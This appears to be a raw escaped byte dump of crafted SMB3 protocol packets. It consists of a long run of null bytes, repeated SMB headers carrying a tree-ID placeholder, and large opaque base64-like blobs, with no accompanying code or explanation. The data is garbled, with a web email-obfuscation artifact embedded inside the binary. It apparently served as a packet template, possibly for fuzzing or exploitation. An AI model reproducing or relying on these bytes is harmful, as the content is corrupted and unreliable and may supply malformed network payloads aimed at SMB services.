0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x83\\\\xf3h6agLCqPqVyXi2VSQ8O6Yb9ijBX54jY6KM+sz33NmS6TK8XlOk920s0E0aajOV++wrR92ds1FOLBO+evLPj4sIvAjLvaLdgk8+BlNZs8PMa9bQ340J83nx1p4f+GLpbxUyzsAzkE9gB3hBYp3+0hNXMjbyjXwB40Q4KiDbip/d7N0CmRT1gLy+n2Rp/EYO5Fkapa4Y4kqDhPvLuOfGUvjN4BNdBk23r0/F3ZmfIe7zH9ecfDqJkkApLkf3Ls4CMvJ48cbGhUqHrML0az1LCeE3BqKLCL3gP10fExyMnFGtbq3rBd+5eKxSXYVD4fBKtFYI47YYbjYxxF76O9LNZEpPP9SiCEo9qRYLDcYzGu81JRU7/GHDKWSnvgjForSvyRO/e9ElIg1ISeyywaPJA1t1skDj8abBEOqAOXimo54/eZzGmLJ92xLwDIl8rHuZsUywgeZH/tSPXYQi0Pswy57TYZ/0/mXVIQjwi8EdJohFb3TKAzdHRMYopPusHBP7qyy18UVuiwGaf989u6seK2ER1R+aoJtvES8V0Zsx6slbdWrGxe4P62uwFxXStC/+qpCauvw/qpZvZo9wb458ezftwsbuOUYNlMWgBno/tWp5iSKfApu/I3RbVgaE3OmiLNYN3jw0gC5cT5tZZvDw9cBmHGcaVuvs+JAbsWoEsUaZd3R3Mn/1c1xYAumA/0VVaASNuohaU+8CmGSpny9/6ngCdejX4X//UMPKFxhlfaDnGbhbgr58SbJnYZ8KVeABMJeRJeLSP1f2AtrbAR8jSk5UgNllJcWnf+EM/Gyzh5DH0RqsyNfEbXNTxRzla1zNfWz0bB4fqzrdNNfNXvtTv9FWqyXCEHLhOz9p7JXzJBBUd0OR9rg8DFXIyNXMHCfeX5v/e2cDPWn7sSP1HU8sivMdWSP79eiYWZ6DOYjDkYmaBrFWuOKpwLyotORDEi1GMahE7btGFTN2IMgml2b9wZvqSuc7aAciGNkl7+NgmkG9r323QqSJrjCgp+DJ9URAkHRp/ovZWeh65j6G5mVS3o3Ux5cH2pfT/VZm8xsBsr1o2YKlVmsY6mPAOnlmaEwFLrPTm5WIYnd0yOc3abTlt6R1RfwenXgqn5K1K6Uq5o7T+KblzWV1TXo0zTIBD/CwnKbkITPd7GkK+fG/pVTIAGxuI84OwkE6U9/WO3niv3bgLtebI/5Oj2ESIrNTwBRdIGzDYcK1VTlSYl0RMsMMZvWqZAhNBs9xfpyBgzAn+5NpIUwKnm6HS2UbNab6SQIQF53r0+Rx8w7xZkOEayDuGvPQ32Y7zfHtM8o8wsNxWPtI1zCcMUyHPA3zAeGkKIy51j911mdZeLmlXULTazhCdl+lYNd6aoUthPLUew6ng+vSLSxqF1N7+/bFkcWd5vuCPigEKxEg+X3d+JviOJaI9GJ2HWIT8ehFzv6JP7ymkH0XaHYKIXXDbGpMhJWmZzOd+KeEt4MY6Be95bnyjLPxR8Htcc2E35+8q074yiBdThfaOMI18K65supem5lEgTe2lQdQurhhNhgbmYPpmWsSerB8R4CiDHQg6B1xxN9lpUnCWCn37Ib9vdQ2V90almoOSh5FfBxJiPIERqxvWkHqv3h/c0c8MZ3kLJi/+5PD+F/rT0hmgD1lUoqZ9KfEAB/ivMQzIbMnhoJ6DpDZwXvWgYON+Ti4Of8cD3JVZFHKCPtFO1LWNuXu9DHS0cChPvbPTNgL1fuz3hWniAOjJxyXhilxEmUKoCuaHrjL7/mCwA8mUTF8nZfDOYFw/CN4ol8UuKSKKNotx6s4EGyOXAGxRTqQw5Rqr70SWFUVy18EO3TCMj/3eC7HjDV7CAh6+160YbDs53m7AehAx+OlUNq01wPuaxFfSqlgcUG+9Rn1b/Xp1jvWeSkCNdYiiiXi1XwsMrdhKZGKroSXSSJclExe6ZgcNNPa/HgjvXbwtmRkgiGneql4mBYmKDzcXCkp/tjnL6/KriY81gMHN4G9ulMunxVyF8wybDcifTOxtarjLXVRuC1Y7vzYaEuHT\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x13\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0#\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd03\\\\x00\\\\x00\\\\x00\\\\x10GCYPv9lQlkfTV1+aTMUTA0VfaLFyhZq68nTvu6n4pfUV30t9T3TFceGCIx4zTnCQ6S5EjjToosWCxmsltoACAot76+pWFnqcM81lhzddyobk6y7FHmjg68R4aFhZxnGaWE98CXh+wNXxpVQrRWuXsT/exO9Fgq3iJa9YrhsWDVrNddlLhlPZSjd+r7Vb1N42DLbI3TsRC6QTWTCW/u9CZP5OtTLfF5RtGJpRD1w7ATC3MGMEx3ecXVNTq93wT9UOpAdiYhTfRbbGSc3CQYjiZAQeP8+9l+vBMXIVPix9JjXoMpMMNALmtmyPcDktAfCRTNLvWW7/Yr/ZO80z7zqvqhJEEdffn8QkT9e5IWcMjcgV3Gglscqoh41iMXn7hUxI2bGaD2DPEQvGkIM1b/vVlcwQZ5hgqlHRLOCDWdMiIPJOyikWBpc0XExEycIbYGOOlrO1qmrdigNdT1yDJQK0Iv0NrdhqHw2+YH85NqAoCiWHU9cXoGYyaYsAy2tz1FEVsu6ci4R/YbYYSf6bOJo/jNWi/2Cpy6YkwJLe5+AMfbY2EaKnFOiMNs9lrNFzpwbfa7F+K9HYIis1Xtz0A4vXrvJashxkwrYVcchVKnccoXc5Q0mj2emCkx7YyU+DWEhpL705osvQUIkjXM4bmBD/8t5Fa2ByIChQeolaJJ3sDLApsbVoDd+8ZbRGl4964iBIMaHFxSapRYrdlwk29AS3LXPiJBFdQQZXwCOROaz7PZfs086Nt3A8Zq8FKpL6/ALGQDfNi2GdixRe8LNkFWt8ZIy8kzuf9uR6sUivF8FZKwniB9XioG9S0Oe0fHmIG8vPISlcD5hQlRVhnbHFybZAECaqzV97MMKdCi1oIys9aUz7r4H1AqrHiS/FXMyd/EP21A6cM3zGjxyktGoQx0hV3sYvthjyIwQAcUKpgmL+VETTLp8QV8kqV2rrzpqzHgbmgFThT13t6mHf9ELtg8wovtONtS0VBsTCaMSSpDwo5Jo7OayvdM0ZgmSJF3q+QK0avgLv/4CGSWX5